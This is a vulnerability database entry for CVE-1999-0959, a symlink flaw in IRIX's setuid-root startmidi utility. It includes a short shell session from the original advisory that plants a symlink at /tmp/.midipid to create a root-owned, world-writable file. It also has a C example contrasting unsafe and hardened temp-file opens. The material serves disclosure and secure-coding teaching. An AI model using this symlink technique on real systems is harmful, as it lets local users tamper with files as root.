IRIX startmidi Program Vulnerability

Vulnerability ID: 1105280; Vulnerability type: Other
Published: 1997-02-09; Updated: 2005-05-02
CVE ID: CVE-1999-0959; CNNVD ID: CNNVD-199702-004
Platform: IRIX; CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/19355
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199702-004
|Vulnerability details
A vulnerability exists in the IRIX startmidi program. A local user can modify arbitrary files via a symbolic link.
|Exploit
source: http://www.securityfocus.com/bid/469/info

A vulnerability exists in the startmidi program from Silicon Graphics. This utility is included with Irix versions 5.x and 6.x with the Iris Digital Media Execution Environment. startmidi is setuid root and creates a temporary file called /tmp/.midipid. It does not check whether this file already exists or whether it is a symbolic link. As a result, it can be used to create root-owned files, with permissions determined by the user's umask.


% umask 0
% ln -s /blardyblar /tmp/.midipid
% startmidi -d /dev/ttyd1
% ls -l /blardyblar
-rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar
% stopmidi -d /dev/ttyd1
%
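
The root cause above is how the temporary file is opened. The C program below is an added example, not code from startmidi or from the original advisory: it contrasts an open call that follows a pre-planted symlink with one that refuses it. The function names, the scratch directory under /tmp and the 0600 mode are assumptions made for the illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: create-or-open with no existence
 * check. open() follows a pre-planted symlink and creates its target,
 * with a mode limited only by the caller's umask. */
int create_pidfile_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened form: O_EXCL makes creation atomic and fails with EEXIST if the
 * name already exists, even as a dangling symlink. The mode is fixed at
 * 0600, so the caller's umask cannot widen it. */
int create_pidfile_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario in a private scratch directory: a symlink named
 * .midipid points at a file that does not exist yet. Returns 1 if the open
 * created the target, 0 if not, -1 on setup failure; *open_errno gets errno. */
int run_scenario(int use_safe, int *open_errno) {
    char dir[] = "/tmp/pidfile-demo-XXXXXX";
    char link_path[64], target[64];
    struct stat st;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(link_path, sizeof link_path, "%s/.midipid", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    if (symlink(target, link_path) != 0) { rmdir(dir); return -1; }
    int fd = use_safe ? create_pidfile_safe(link_path)
                      : create_pidfile_unsafe(link_path);
    *open_errno = (fd < 0) ? errno : 0;
    if (fd >= 0) close(fd);
    int created = (stat(target, &st) == 0);
    unlink(target); unlink(link_path); rmdir(dir);
    return created;
}

int main(void) {
    int e = 0;
    int via_unsafe = run_scenario(0, &e);
    int via_safe = run_scenario(1, &e);
    printf("unsafe created target: %d, safe created target: %d (errno %d)\n",
           via_unsafe, via_safe, e);
    return 0;
}
```

A privileged program is better served by keeping its PID file in a directory that only root can write to, so that no other user can place a name there in advance.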
|References

Source: BID
Name: 469
Link: http://www.securityfocus.com/bid/469
Source: OSVDB
Name: 8447
Link: http://www.osvdb.org/8447
Source: SGI
Name: 19980301-01-PX
Link: ftp://patches.sgi.com/support/free/security/advisories/19980301-01-PX